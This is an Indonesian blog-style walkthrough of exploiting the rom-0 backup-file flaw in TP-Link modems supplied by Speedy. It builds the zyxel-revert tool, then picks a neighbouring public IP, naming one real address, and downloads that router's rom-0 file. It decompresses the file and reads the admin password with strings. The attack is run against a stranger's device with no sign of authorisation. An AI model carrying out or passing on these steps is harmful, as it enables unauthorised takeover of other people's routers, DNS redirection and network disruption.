Tau kah kamu kalau tp-link modem router kita yang biasanya dikasih oleh speedy tersimpan vuln yang sangat berbahya (critical vulnerbility), dengan mendwonload file backup tp-link ato biasa di panggil rom-0 kita bisa mendapatkan password untuk akses ke modem router tersebut..

pertayaan nya..
:
bagaimana jika seorang hacker bisa mengakses modem router tp-link kita ???

waauuuchhh !! Mungkin jaringan kita akan down, lelet , tidak bisa dipakai .. atau bahkan bisa redirect ke DNS yang membahayakan dan bla .. bla .. bla ..
yang jelas sangat berbahaya.. :v

Pertama download toolnya dibawah ini,
Source code untuk compress/decompress bisa didownload dari snapshot terakhir di http://git.kopf-tisch.de/?p=zyxel-revert;a=summary

Untuk instalasinya ikuti perintah dibawah ini :

1 2 3 4 5 6

# cd /root # mkdir src && cd src download snapshot terakhir, misalnya zyxel-revert-779bfd5.tar.gz # tar xf zyxel-revert-779bfd5.tar.gz # cd zyxel* # make

karena pengujian ini di lakukan dengan ip public., mari kita lakukan pengetesan ip tetangga dengan ping
saya memulai dengan xxx.xxx.xxx.130 sedang ip saya xxx.xxx.xxx.127
dan saya mendapatkan balasan dari ip 125.161.204.132


untuk pengujian apakah modem/router ip tersebut Tp-LINK ato bukan . kita masukan ip tersebut dit browser kita
dan ternyata ip tersebut mengggunakan TD-W8101G


Masukan akhiran rom-0 pada login page tersebut.


Waw..waw.. !!!! kita dapet file rom-0 ya.. :v
file rom-0 nongol di /home/redlabel/zyxel-revert

setelah kita mendapatkan file rom-0 kita mendecode file trsebut untuk mendapatkan password router.
Saatnya script zyxel-revert beraksi :v

Masukan perintah :

# ./decompress rom-0

Lalu ketikan perintah :

# strings rom-0.decomp


Biasanya password berada pada baris pertama.
dan mission complete ... ingat jiwa ethical hacking tidak untuk merusak. :v
Sekian, semoga bermanfaat.
NB : Untuk Cara mendaftarkan ID Telkom speedy TP-Link ke wifi.id, akan saya jelaskan lain waktu.